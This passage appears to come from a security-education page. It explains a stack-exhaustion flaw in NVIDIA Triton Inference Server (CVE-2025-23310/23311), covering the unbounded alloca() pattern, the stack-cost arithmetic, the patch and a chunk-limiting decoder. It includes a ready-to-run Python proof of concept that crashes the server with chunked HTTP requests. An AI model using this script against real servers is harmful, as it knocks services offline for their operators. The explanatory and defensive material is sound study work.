* Always provide a **maximum field width** (e.g. `%511s`).
* Prefer safer alternatives such as `snprintf`/`strncpy_s`.

### Real-World Example: CVE-2025-23310 & CVE-2025-23311 (NVIDIA Triton Inference Server)

NVIDIA’s Triton Inference Server (≤ v25.06) contained multiple **stack-based overflows** reachable through its HTTP API.
The vulnerable pattern appeared repeatedly in `http_server.cc` and `sagemaker_server.cc`:

```c
int n = evbuffer_peek(req->buffer_in, -1, NULL, NULL, 0);
if (n > 0) {
    /* allocates 16 * n bytes on the stack */
    struct evbuffer_iovec *v = (struct evbuffer_iovec *)
        alloca(sizeof(struct evbuffer_iovec) * n);
    ...
}
```

1. `evbuffer_peek` (libevent) returns the **number of internal buffer segments** that compose the current HTTP request body.
2. Each segment causes a **16-byte** `evbuffer_iovec` to be allocated on the **stack** via `alloca()`, **without any upper bound**.
3. By abusing **HTTP _chunked transfer-encoding_**, a client can force the request to be split into **hundreds of thousands of 6-byte chunks** (`"1\r\nA\r\n"`). This makes `n` grow unbounded until the stack is exhausted.

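The arithmetic behind these three steps can be sketched in a few lines of Python. This is only a back-of-the-envelope model: it assumes every chunk ends up as exactly one buffer segment, that `sizeof(struct evbuffer_iovec)` is 16 bytes (64-bit build), and that the thread runs with an 8 MiB stack (a common Linux default, not something confirmed for every Triton deployment). The names `stack_cost` and `chunks_to_exhaust` are made up for this illustration.

```python
IOVEC_SIZE = 16                 # assumed sizeof(struct evbuffer_iovec) on 64-bit
CHUNK = b"1\r\nA\r\n"           # smallest useful chunk: 1 data byte, 6 bytes on the wire
STACK_LIMIT = 8 * 1024 * 1024   # assumed 8 MiB stack (common Linux default)


def stack_cost(chunks: int) -> tuple[int, int]:
    """Return (bytes sent by the client, bytes requested from alloca())."""
    return chunks * len(CHUNK), chunks * IOVEC_SIZE


def chunks_to_exhaust(stack_limit: int = STACK_LIMIT) -> int:
    """Smallest segment count whose iovec array alone fills the whole stack."""
    return -(-stack_limit // IOVEC_SIZE)  # ceiling division


sent, on_stack = stack_cost(523_800)
print(sent, on_stack, round(on_stack / sent, 2))
print(chunks_to_exhaust())
```

Under these assumptions the script prints `3142800 8380800 2.67` followed by `524288`: about 3 MB of traffic turns into about 8 MB of stack requests. A chunk count slightly below 524,288 is already enough in practice, because the rest of the call chain occupies part of the stack as well.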
#### Proof-of-Concept (DoS)
```python
#!/usr/bin/env python3
import socket
import sys


def exploit(host="localhost", port=8000, chunks=523_800):
    s = socket.create_connection((host, int(port)))
    s.sendall((
        f"POST /v2/models/add_sub/infer HTTP/1.1\r\n"
        f"Host: {host}:{port}\r\n"
        "Content-Type: application/octet-stream\r\n"
        "Inference-Header-Content-Length: 0\r\n"
        "Transfer-Encoding: chunked\r\n"
        "Connection: close\r\n\r\n"
    ).encode())

    for _ in range(int(chunks)):     # 6-byte chunk ➜ 16-byte alloc
        s.sendall(b"1\r\nA\r\n")     # amplification factor ≈ 2.7x
    s.sendall(b"0\r\n\r\n")          # end of chunks
    s.close()


if __name__ == "__main__":
    # CLI arguments arrive as strings; exploit() converts port and chunks to int
    exploit(*sys.argv[1:])
```
A ~3 MB request (523,800 six-byte chunks, which translate into roughly 8 MB of `alloca()` requests) is enough to exhaust the stack and **crash** the daemon on a default build.

#### Patch & Mitigation
The 25.07 release replaces the unsafe stack allocation with a **heap-backed `std::vector`** and gracefully handles `std::bad_alloc`:

```c++
std::vector<evbuffer_iovec> v_vec;
try {
    v_vec = std::vector<evbuffer_iovec>(n);
} catch (const std::bad_alloc &e) {
    return TRITONSERVER_ErrorNew(TRITONSERVER_ERROR_INVALID_ARG, "alloc failed");
}
struct evbuffer_iovec *v = v_vec.data();
```

Lessons learned:
* Never call `alloca()` with attacker-controlled sizes.
* Chunked requests can drastically change the shape of server-side buffers.
* Validate / cap any value derived from client input *before* using it in memory allocations.

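The last lesson can be illustrated with a small chunked-body decoder that enforces a cap on the number of chunks before it buffers any more data. This is a simplified sketch, not how Triton or libevent parse requests: `decode_chunked`, `TooManyChunks` and the `MAX_CHUNKS` value are hypothetical names and numbers chosen for the example, and trailers and malformed chunk framing are not handled.

```python
MAX_CHUNKS = 1024  # hypothetical cap; tune to the largest legitimate request


class TooManyChunks(ValueError):
    """Raised when a body is split into more chunks than the server allows."""


def decode_chunked(body: bytes, max_chunks: int = MAX_CHUNKS) -> bytes:
    """Decode a chunked HTTP body, rejecting it once max_chunks is exceeded."""
    out, pos, count = bytearray(), 0, 0
    while True:
        eol = body.index(b"\r\n", pos)                # end of the chunk-size line
        size = int(body[pos:eol].split(b";")[0], 16)  # ignore chunk extensions
        pos = eol + 2
        if size == 0:                                 # last-chunk marker
            return bytes(out)
        count += 1
        if count > max_chunks:                        # enforce the cap before buffering
            raise TooManyChunks(f"more than {max_chunks} chunks")
        out += body[pos:pos + size]
        pos += size + 2                               # skip the data and its trailing CRLF
```

For example, `decode_chunked(b"1\r\nA\r\n" * 3 + b"0\r\n\r\n")` returns `b"AAA"`, while the same body with `max_chunks=2` raises `TooManyChunks`. The point of the design is that the limit is checked on the client-derived count itself, so no allocation downstream ever scales with an unbounded value.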
## References
* [watchTowr Labs – Stack Overflows, Heap Overflows and Existential Dread (SonicWall SMA100)](https://labs.watchtowr.com/stack-overflows-heap-overflows-and-existential-dread-sonicwall-sma100-cve-2025-40596-cve-2025-40597-and-cve-2025-40598/)
* [Trail of Bits – Uncovering memory corruption in NVIDIA Triton](https://blog.trailofbits.com/2025/08/04/uncovering-memory-corruption-in-nvidia-triton-as-a-new-hire/)

{{#include ../../banners/hacktricks-training.md}}